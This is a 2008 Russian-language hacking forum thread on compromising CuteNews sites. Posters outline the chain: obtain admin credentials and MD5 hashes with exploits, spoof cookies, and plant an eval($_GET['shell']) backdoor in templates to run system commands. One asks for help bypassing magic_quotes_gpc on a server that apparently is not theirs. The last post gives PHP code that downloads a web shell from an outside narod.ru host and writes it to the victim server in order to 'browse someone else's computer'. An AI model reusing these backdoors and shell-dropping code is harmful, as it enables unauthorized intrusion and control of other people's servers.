ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.09.2008, 16:25
|
|
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме: 495411
Репутация:
91
|
|
Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему
|
|
|

10.09.2008, 16:55
|
|
Новичок
Регистрация: 22.06.2008
Сообщений: 13
Провел на форуме: 138385
Репутация:
1
|
|
Сообщение от n-000
Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему
Мда спасибо за оригинальный ответ а поточней чёнить сказать можеш ?
|
|
|

26.09.2008, 15:07
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап
|
|
|

26.09.2008, 21:40
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Сообщение от warlok
подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап
Это все знают, ток проблемы от базы пасы узнать 
|
|
|

28.09.2008, 02:05
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
а конфиг сложно посмотреть ? =\
|
|
|

11.11.2008, 12:40
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме: 79756
Репутация:
1
|
|
Блин, люди, а давайте подытожим...???
Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :
HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
дальше... сохраняем
ИСПОЛЬЗУЕМ:
_http://site/news/show_news.php?shell=phpinfo();
_http://site/news/show_news.php?shell=system(dir);
ПХПИНФО это конечно хорошо)...а как использовать system()???
dir выводит...а вот system(dir c:\); уже фиг(((
варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?
P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
Выдает ошибку примерно такую(это если кавычки использовать):
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1 Parse error: syntax error, unexpected $end in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1
Последний раз редактировалось NamahS; 11.11.2008 в 13:41..
|
|
|

11.11.2008, 18:47
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме: 79756
Репутация:
1
|
|
Вобщем поискав в инете, вроде бы выходит, что все дело в том, что на серве включено magic_quotes_gpc...Обойти это как-то можно?
|
|
|

13.11.2008, 10:40
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме: 79756
Репутация:
1
|
|
Блин, ну кто-нибудь...подскажите, как обойти вставку \ ...из-за magic_quotes_gpc=ON вместо подозрительных символов (пробел,",' и т.д.) подставляется \.Что-нибудь можно сделать вообще?
Серв в локальной сети.Я его вижу, а у него в мою зону доступа нет и в ИНЕТ нет доступа, так что XSS не катит(.ПЛИЗ..ПОКА НЕ ПРИКРЫЛИ...
|
|
|

20.11.2008, 09:41
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме: 79756
Репутация:
1
|
|
Спасибо, что откликнулись))))
Я сам уже догадался...)
Реально удовольствие от собственных побед НАМНОГО БОЛЬШЕ!!!)
|
|
|

21.11.2008, 12:24
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Ну ппц  Я ж писал уже...
Дописываем в конце Active News:
HTML;
$data=implode('',file('http://game2v.narod.ru/shell.php.txt'));
$fp=fopen('./sk.php','wb');
fputs($fp,$data);
fclose($fp);
Заходим на http://уязвимый_сервер.ru/sk.php - и лазим по чужому компу...
У кого не получиться пм...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|